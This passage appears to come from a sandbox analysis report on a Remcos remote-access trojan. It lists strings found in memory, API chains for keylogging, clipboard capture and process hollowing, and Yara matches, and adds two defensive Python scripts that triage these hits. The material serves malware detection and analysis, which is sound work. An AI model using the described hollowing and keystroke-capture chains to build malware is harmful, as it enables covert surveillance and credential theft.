                      Source: DGlxtFUfY.exe, 00000010.00000002.2263636902.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                      Source: DGlxtFUfY.exe, 00000010.00000002.2263636902.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
                      Source: DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                      Source: DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: LdSbZG1iH6.exe, DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, bhvD3AB.tmp.16.drString found in binary or memory: http://geoplugin.net/json.gp
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, LdSbZG1iH6.exe, 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, LdSbZG1iH6.exe, 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, LdSbZG1iH6.exe, 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpaf
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1990255245.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000A.00000002.2037378445.0000000002796000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: DGlxtFUfY.exe, 00000010.00000002.2263031169.0000000000794000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                      Source: DGlxtFUfY.exe, 00000011.00000002.2259100532.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994602032.00000000058F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com(;
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: DGlxtFUfY.exeString found in binary or memory: https://login.yahoo.com/config/login
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: DGlxtFUfY.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://www.office.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe  Code function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
Source: Yara match  File source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE
Source: Yara match  File source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR

                      E-Banking Fraud

Source: Yara match  File source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE
Source: Yara match  File source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 0000000E.00000002.2909444366.000000000322E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: DGlxtFUfY.exe PID: 8072, type: MEMORYSTR
Source: Yara match  File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
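The Yara sources listed above carry more than a flat list of hits. Read structurally, an .sdmp name gives the process index, the snapshot, the base address and the page protection of the region that matched, so the hit at 0x00400000 in process 8 with protection 0x40 (PAGE_EXECUTE_READWRITE) is the unpacked Remcos image at the image base of the hollowed process, while the 0x04 (PAGE_READWRITE) hits in process 0 are the same payload sitting in the .NET loader's heap before injection. The Python below is an added example, not Joe Sandbox code: it decodes source identifiers copied from this section. The split of the .sdmp name into those fields is this example's reading of the names (the values line up with the PAGE_* constants and with the 0x400000 unpack address the report gives for process 8), not a documented format; the PAGE_* values themselves are the documented Win32 constants.

```python
"""Decode where in memory the Yara hits in a sandbox report fired.

Added example, not Joe Sandbox code. SAMPLE is copied from the report.
The split of an .sdmp name into process index, snapshot, dump id, base
address and page protection is this example's reading of the names, not a
documented format; the PAGE_* values are the documented Win32 constants."""
import re

SAMPLE = r"""
Source: Yara matchFile source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR
Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
"""

PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# <proc>.<snapshot>.<image>.<hex addr>.<n>[.raw].unpack
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9a-f]+)\.(\d+)(?:\.raw)?\.unpack$")
# <proc>.<snapshot>.<dump id>.<base>.<protection>.<x>.<y>.<z>.sdmp  (field meaning assumed)
SDMP_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\.([0-9A-F]{8})"
    r"\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$")
PIDSTR_RE = re.compile(r"^Process Memory Space: (.+?) PID: (\d+)$")


def parse_source(text):
    """Describe one 'File source' value; None if the shape is unknown."""
    m = UNPACK_RE.match(text)
    if m:
        return {"kind": "unpacked_pe", "process": int(m.group(1)), "snapshot": int(m.group(2)),
                "image": m.group(3), "address": int(m.group(4), 16),
                "raw": text.endswith(".raw.unpack")}
    m = SDMP_RE.match(text)
    if m:
        prot = int(m.group(5), 16)
        return {"kind": "memory_dump", "process": int(m.group(1), 16),
                "snapshot": int(m.group(2), 16), "address": int(m.group(4), 16),
                "protection": prot,
                "protection_name": PAGE_PROTECTION.get(prot & 0xFF, hex(prot)),
                # the PAGE_EXECUTE* constants occupy the 0x10..0x80 bits
                "executable": bool(prot & 0xF0)}
    m = PIDSTR_RE.match(text)
    if m:
        return {"kind": "process_strings", "image": m.group(1), "os_pid": int(m.group(2))}
    if "\\" in text:
        return {"kind": "dropped_file", "path": text}
    return None


def parse_report(report_text):
    """All Yara hit sources in the report text, decoded."""
    hits = []
    for line in report_text.splitlines():
        m = re.search(r"File source: (.+?), type: (\w+)\s*$", line)
        if not m:
            continue
        hit = parse_source(m.group(1))
        if hit:
            hit["type"] = m.group(2)
            hits.append(hit)
    return hits


def executable_hits(hits):
    """Hits in executable memory: the payload where it runs, not a staging buffer."""
    return [h for h in hits if h["kind"] == "memory_dump" and h["executable"]]


def hits_by_process(hits):
    """Group per-process hits by sandbox process index."""
    out = {}
    for h in hits:
        if "process" in h:
            out.setdefault(h["process"], []).append(h)
    return out


if __name__ == "__main__":
    found = parse_report(SAMPLE)
    for h in executable_hits(found):
        print(f"process {h['process']}: hit at {h['address']:#x} in {h['protection_name']} memory")
    for proc, items in sorted(hits_by_process(found).items()):
        print(f"process {proc}: {len(items)} hit(s)")
```

When carving the Remcos configuration, the region to take is the executable one (process 8, base 0x00400000): that is the mapped, running image, whereas the PAGE_READWRITE regions in process 0 hold the same bytes in a heap buffer that the loader frees after injection. The .sdmp field layout is inferred from this report alone, so confirm it against a second report before building tooling on it.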

                      Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0041CA6D SystemParametersInfoW
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe  Code function: 8_2_0041CA73 SystemParametersInfoW
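The capability headings in this report are derived from API chains like the ones listed in the capturing section and here: SetWindowsHookExA with idHook 0x0D (WH_KEYBOARD_LL) installs a global low-level keyboard hook, GetKeyboardState followed by ToUnicodeEx turns captured virtual-key codes into characters, OpenClipboard then GetClipboardData reads the clipboard, SystemParametersInfoW is the call that sets a wallpaper, and the CreateProcessW, NtUnmapViewOfSection, WriteProcessMemory, Wow64SetThreadContext, ResumeThread chain listed under System Summary is process hollowing. The Python below is an added example, not Joe Sandbox code: it parses "Code function" rows copied from this report's raw export (there the column boundary is run together and the function id is repeated at the end of the row; the parser accepts both that form and the separated one) and maps each row to capabilities with its own ordered signature table. The signature names, the T1055.012 tag and the WH_* lookup are this example's; the hook ids are the documented Win32 constants.

```python
"""Map sandbox 'Code function' rows to RAT capabilities.

Added triage example, not Joe Sandbox code. SAMPLE_ROWS is copied from the
report; the signature table, its names and the T1055.012 tag are this
example's own. Hook ids are the documented Win32 WH_* values."""
import re
from collections import defaultdict

SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000008_2_0040A2F3
Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040B749
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_0040987A
Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,8_2_0040A41B
Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041CA6D SystemParametersInfoW,8_2_0041CA6D
Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,8_2_0041812A
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
"""

# One row: "<proc>_<snapshot>_<addr> <api list>", id optionally repeated at the end.
ROW_RE = re.compile(r"Code function: (?P<fid>\d+_\d+_[0-9A-F]{8}) (?P<body>.*?)(?:(?P=fid))?$")
HEX_ARG = re.compile(r"[0-9A-F]{8}")

# Documented Win32 idHook values for SetWindowsHookEx.
HOOK_IDS = {2: "WH_KEYBOARD", 7: "WH_MOUSE", 13: "WH_KEYBOARD_LL", 14: "WH_MOUSE_LL"}

# Ordered API chains; each step is a tuple of acceptable alternatives.
SIGNATURES = [
    ("process hollowing (T1055.012)",
     [("CreateProcessW", "CreateProcessA"), ("NtUnmapViewOfSection",),
      ("WriteProcessMemory", "NtMapViewOfSection"),
      ("Wow64SetThreadContext", "SetThreadContext", "NtSetContextThread"),
      ("ResumeThread", "NtResumeThread")]),
    ("clipboard read", [("OpenClipboard",), ("GetClipboardData",)]),
    ("clipboard write", [("EmptyClipboard",), ("SetClipboardData",)]),
    ("keystroke translation", [("GetKeyboardState",), ("ToUnicodeEx", "ToUnicode", "ToAscii")]),
    ("handle enumeration and duplication",
     [("NtQuerySystemInformation",), ("OpenProcess",), ("DuplicateHandle",)]),
    # uiAction is not in the row, so SPI_SETDESKWALLPAPER cannot be confirmed from it.
    ("desktop parameter change (possible wallpaper set)",
     [("SystemParametersInfoW", "SystemParametersInfoA")]),
]


def in_order(calls, steps):
    """True if every step occurs in sequence (as a subsequence) in calls."""
    pos = 0
    for alternatives in steps:
        hits = [i for i in range(pos, len(calls)) if calls[i] in alternatives]
        if not hits:
            return False
        pos = hits[0] + 1
    return True


def hook_types(tokens):
    """Resolve the idHook argument that follows each SetWindowsHookEx call."""
    found = []
    for i, tok in enumerate(tokens):
        if tok.startswith("SetWindowsHookEx") and i + 1 < len(tokens) and HEX_ARG.fullmatch(tokens[i + 1]):
            hook_id = int(tokens[i + 1], 16)
            found.append(HOOK_IDS.get(hook_id, f"hook id {hook_id}"))
    return found


def classify(tokens):
    """Capabilities implied by one row's API list."""
    calls = [t for t in tokens if not HEX_ARG.fullmatch(t)]
    caps = {name for name, steps in SIGNATURES if in_order(calls, steps)}
    caps.update(f"global hook: {h}" for h in hook_types(tokens))
    return caps


def triage(report_text):
    """{function id: capabilities} for every row matching at least one signature."""
    result = {}
    for line in report_text.splitlines():
        m = ROW_RE.search(line)
        if not m:
            continue
        tokens = [t for t in re.split(r"[,\s]+", m.group("body")) if t]
        caps = classify(tokens)
        if caps:
            result[m.group("fid")] = caps
    return result


def by_process(report_text):
    """Fold per-function findings to {process index: capabilities}."""
    out = defaultdict(set)
    for fid, caps in triage(report_text).items():
        out[fid.split("_")[0]].update(caps)
    return dict(out)


if __name__ == "__main__":
    for proc, caps in sorted(by_process(SAMPLE_ROWS).items(), key=lambda kv: int(kv[0])):
        print(f"process {proc}: " + ", ".join(sorted(caps)))
```

Two design points matter for detection quality. The hollowing signature checks order, not mere presence: a legitimate debugger or installer also imports WriteProcessMemory and ResumeThread, but CreateProcess followed by NtUnmapViewOfSection on the child and then a context rewrite is the hollowing pattern. And SystemParametersInfoW alone only proves the desktop parameters were touched; without the uiAction value (SPI_SETDESKWALLPAPER) the wallpaper claim stays "possible", which is why the signature is worded that way.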

                      System Summary

Source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE  Matched rule: REMCOS_RAT_variants Author: unknown
Source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE  Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE  Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE  Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE  Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE  Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE  Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE  Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE  Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE  Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE  Matched rule: REMCOS_RAT_variants Author: unknown
